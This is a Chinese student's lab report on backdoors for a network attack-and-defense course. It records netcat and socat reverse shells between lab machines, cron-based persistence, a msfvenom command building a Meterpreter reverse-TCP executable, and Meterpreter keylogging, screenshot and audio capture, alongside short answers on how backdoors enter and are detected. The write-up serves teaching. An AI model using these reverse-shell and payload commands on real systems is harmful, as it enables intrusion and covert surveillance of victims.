20145201 李子璇 《网络攻防》 后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 软件中本身就含有后门
  • 和软件进行捆绑,下载打开后进入系统
  • 由于系统漏洞,主机被攻击了,从而被安装了后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 让用户以为是正常的软件,启动软件时后门就启动。
  • Linux定时任务系统 Cron,让使用者在固定时间或固定间隔执行程序。
  • Win系统 用任务计划程序来定时自动运行程序

(3)Meterpreter有哪些给你映像深刻的功能?

  • 记录键盘输入的字符
  • 开启摄像头

(4)如何发现自己有系统有没有被安装后门?

  • 系统运行速度突然变得缓慢:占用了内存和CPU资源,在后台运行了大量非法操作
  • 检查系统对外开放的端口,看有没有可疑的进程使用某个端口传输数据。
    netstat –an来查看所有TCP/UDP端口的连接

2.实验总结与体会
本次实验我学习了nc如何获取远程主机的Shell,使用msfenom生成后门可执行文件,然后尝试了一些Meterpreter常用功能,如记录键盘的输入,截屏,对网络系统的操作等。这一路做下来感觉太可怕,我们现在做的对于大神来说恐怕只是小case而已,提高安全意识从贴上摄像头开始...

3.实践过程记录

(1)使用netcat获取主机操作Shell,cron启动
win获得linux shell
  • win查看ip地址
    886975-20170314110607463-505195636.png

  • win打开监听(这时需要允许防火墙访问)
    886975-20170314112813963-1312790108.png

  • linux反弹连接win
    886975-20170314113027807-251292790.png

  • 在在windows下就获得了linux的shell,可以运行linux下的指令,我选择运行ls命令尝试一下:
    886975-20170314113259620-781670845.png
    成功了

linux获得win shell
  • 在kali中获取linux的ip
    886975-20170314111554010-1826425660.png
  • 在win下反弹连接linux
    输入c:\nc文件目录路径>ncat.exe -e cmd.exe 192.168.134.128 5201
  • 连接上之后,在linux下可看到windows命令提示
    886975-20170314112458260-1994286839.png
cron启动

在linux终端输入crontab -e命令,可以修改用户的cron配置:
886975-20170314114533791-325794135.png

修改一下
886975-20170314114948651-1669139330.png
此时,linux每分钟自动运行指令,反弹至win的5201端口。
886975-20170314115240104-911809754.png
可以使用命令crontab -l 查看查看配置文件
886975-20170314115454745-2008107231.png
获取shell成功后,ls一下看看
886975-20170314115723073-257687948.png

(2)使用socat获取主机操作Shell, 任务计划启动
  • windows使用socat获取kali shell:
    kali上用socat tcp-listen:5201把cmd绑定到端口5201
    并用socat tcp-l:5201 system:bash,pty,stderr反弹连接
    886975-20170314141425666-630785672.png

windows使用socat readline tcp:192.168.134.129 5201开启监听
886975-20170314141135760-1897033797.png

检测一下
886975-20170314141816245-2010085844.png

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

meterpreter

生成后门程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.155.4 LPORT=5201 -f exe > 5201lzx.exe来生成后门程序,然后用ncat方法发送到windows机中。

886975-20170319183844791-262865970.jpg

  • 在Kali端用msfconsole指令进行msf设置,使用监听模块,设置payload,设置反弹回连的IP和端口。
    886975-20170317150555573-233862205.png

  • 运行 获取主机shell
    886975-20170317150942229-204131444.png

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 用screenshot来截个图吧..
    886975-20170319184256182-1153802714.jpg

  • 获取记录击键记录..
    886975-20170317151344432-1873044494.png
    886975-20170317151353916-1141790323.png

  • 获取音频..
    886975-20170317151435776-442843643.png
    886975-20170317151451604-17696405.png

不过 提权失败了...

转载于:https://www.cnblogs.com/20145201lzx/p/6544366.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值